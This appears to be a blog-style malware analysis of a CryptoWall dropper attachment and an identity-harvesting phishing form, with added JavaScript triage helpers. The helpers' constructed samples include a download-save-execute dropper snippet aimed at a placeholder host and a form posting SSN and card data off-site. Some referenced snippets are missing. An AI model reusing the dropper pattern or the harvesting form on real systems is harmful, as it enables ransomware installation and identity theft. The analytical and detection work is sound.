We can see that it was creating an ActiveXObject wrapping XMLHttpRequest (the ActiveX form of XMLHTTP) to download a file. It then created a second ActiveXObject, ADODB.Stream, to write the downloaded binary to disk: the file was saved into the %TEMP% folder under a name like "45645459.exe". A third ActiveXObject, WScript.Shell, was then used to execute the saved file. The URL the file was retrieved from was something like:
This may look like nothing more than a request for an image file, but if you actually retrieve it, it turns out to be a Windows executable. After analyzing the file, we have determined that it is a CryptoWall ransomware variant. So if you open the attachment expecting to see a resume, you could instead end up with your files encrypted by CryptoWall.
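The download, save and execute chain described above, as an added triage helper that is not the attachment's script and not code from the page: it takes a deobfuscated script as text and reports the ActiveX ProgIDs it instantiates, the URL handed to open(), the dropped file name, and whether all three stages of the chain are present. The sample script at the bottom is constructed to mirror the described behaviour; the hostname example.invalid, the path and the file name are placeholders, not the real indicators.

```javascript
// Added example (not the attachment's script): static triage for the
// classic WSH/ActiveX dropper chain:
//   XMLHTTP (download) -> ADODB.Stream (write bytes to %TEMP%) -> WScript.Shell (run).
// Run with: node dropper-triage.js

// ProgIDs that, appearing together, form the download-save-execute chain.
const CHAIN = {
  download: [/msxml2\.xmlhttp/i, /microsoft\.xmlhttp/i, /winhttp\.winhttprequest/i],
  save: [/adodb\.stream/i],
  execute: [/wscript\.shell/i, /shell\.application/i],
};

// Collect every ActiveXObject("...") ProgID in a (deobfuscated) script.
function progIds(script) {
  const ids = [];
  const re = /ActiveXObject\s*\(\s*["']([^"']+)["']\s*\)/gi;
  let m;
  while ((m = re.exec(script)) !== null) ids.push(m[1]);
  return ids;
}

// Pull the indicators an analyst wants: the URL passed to .open(), the
// dropped file name, use of %TEMP%, and whether a process is launched.
function indicators(script) {
  const url = /\.open\s*\(\s*["'](?:GET|POST)["']\s*,\s*["']([^"']+)["']/i.exec(script);
  const dropped = /([^"'\\\/]+\.(?:exe|scr|com|bat|dll))["']/i.exec(script);
  return {
    url: url ? url[1] : null,
    droppedFile: dropped ? dropped[1] : null,
    writesToTemp: /%TEMP%/i.test(script),
    runsProcess: /\.(?:Run|Exec|ShellExecute)\s*\(/i.test(script),
  };
}

function triage(script) {
  const ids = progIds(script);
  const stage = {};
  for (const [name, patterns] of Object.entries(CHAIN)) {
    stage[name] = ids.some((id) => patterns.some((p) => p.test(id)));
  }
  const ind = indicators(script);
  // The URL's extension says nothing about the content: the sample on the
  // page fetched what looked like an image and got a PE file back.
  const looksLikeImage = ind.url ? /\.(jpe?g|png|gif)(\?|$)/i.test(ind.url) : false;
  const verdict = stage.download && stage.save && stage.execute
    ? 'dropper: download-save-execute chain present'
    : 'no complete dropper chain';
  return { progIds: ids, stage, ...ind, looksLikeImage, verdict };
}

// Constructed sample shaped like the deobfuscated attachment described above.
// Hostname, path and file name are placeholders, not the real indicators.
const SAMPLE = `
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "http://example.invalid/images/photo.jpg", false);
x.send();
var s = new ActiveXObject("ADODB.Stream");
s.Type = 1; s.Open(); s.Write(x.responseBody);
var sh = new ActiveXObject("WScript.Shell");
var p = sh.ExpandEnvironmentStrings("%TEMP%") + "\\\\45645459.exe";
s.SaveToFile(p, 2);
sh.Run(p, 0, false);
`;

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

The verdict keys on the three ProgIDs appearing together; a single one of them (ADODB.Stream in a legitimate HTA, say) is not flagged. The regexes only work on deobfuscated text, so run the script through your usual deobfuscation step first, and treat the extracted URL as an indicator to fetch from an isolated analysis box, never from the analyst's workstation.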
The From: header uses addresses that look reasonably similar to the impersonated organization's real addresses, as long as you don't look too closely.
Subject lines include:
- Un-authorized User
- Verification Required
- Must verify your account
- Validate account
The form asks not only for the victim's name and address, but also for their Social Security number and a credit card number. When you click the "Submit Form" button, all of that data is posted to a server in Russia. That information is more than enough to steal your identity.
The obfuscated version looks like this (partial code shown only):
After deobfuscation, it generated a perfectly normal-looking HTML page with a form, like the following snippet:
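The page's own deobfuscated form is not reproduced here. As an added example that is not the phishing page's markup and not code from the page, the helper below answers the two questions that matter once you have the deobfuscated HTML in hand: which fields does the form harvest, and does "Submit Form" send them somewhere other than the brand it claims to be. The sample form is constructed; the action hostname example.invalid and the claimed domain bank.example are placeholders, and no geolocation of the host is attempted.

```javascript
// Added example (not the page's form): triage of a deobfuscated
// credential/identity-harvesting form. Run with: node form-triage.js

// Field-name keywords that indicate what the form is collecting.
const SENSITIVE = {
  ssn: /ssn|social/i,
  card: /card|cvv|cvc|expir|expdate/i,
  password: /pass|pwd/i,
  identity: /name|address|dob|birth/i,
};

// Extract the first <form>'s action and method plus every named field.
function parseForm(html) {
  const form = /<form\b([^>]*)>/i.exec(html);
  const attrs = form ? form[1] : '';
  const action = /action\s*=\s*["']([^"']*)["']/i.exec(attrs);
  const method = /method\s*=\s*["']([^"']*)["']/i.exec(attrs);
  const fields = [];
  const re = /<(?:input|select|textarea)\b[^>]*\bname\s*=\s*["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) fields.push(m[1]);
  return {
    action: action ? action[1] : null,
    method: method ? method[1].toUpperCase() : 'GET',
    fields,
  };
}

// Group field names by the kind of data they collect.
function classify(fields) {
  const hits = {};
  for (const f of fields) {
    for (const [kind, p] of Object.entries(SENSITIVE)) {
      if (p.test(f)) (hits[kind] = hits[kind] || []).push(f);
    }
  }
  return hits;
}

// claimedDomain is the brand the mail pretends to come from; a form that
// posts SSN or card data to any other host is a harvesting form.
function triageForm(html, claimedDomain) {
  const { action, method, fields } = parseForm(html);
  let host = null;
  try { host = action ? new URL(action).hostname : null; } catch (e) { host = null; }
  const offDomain = host !== null && host !== claimedDomain && !host.endsWith('.' + claimedDomain);
  const harvested = classify(fields);
  const verdict = offDomain && (harvested.ssn || harvested.card)
    ? 'credential/identity harvesting form'
    : 'inconclusive';
  return { action, method, host, offDomain, fields, harvested, verdict };
}

// Constructed sample form; hostname and field names are placeholders.
const SAMPLE_HTML = `
<form action="http://example.invalid/verify/post.php" method="POST">
  Full name <input type="text" name="fullname">
  Address <input type="text" name="address">
  SSN <input type="text" name="ssn">
  Card number <input type="text" name="cardnumber">
  Expiry <input type="text" name="expdate">
  <input type="submit" value="Submit Form">
</form>
`;

console.log(JSON.stringify(triageForm(SAMPLE_HTML, 'bank.example'), null, 2));
```

A relative action (action="post.php") yields no hostname and the verdict stays inconclusive; in that case look at the page's origin, since the data still goes to whoever hosts the page. Field names are only a hint: a form can label an SSN field "id" and still harvest it, so read the visible labels too.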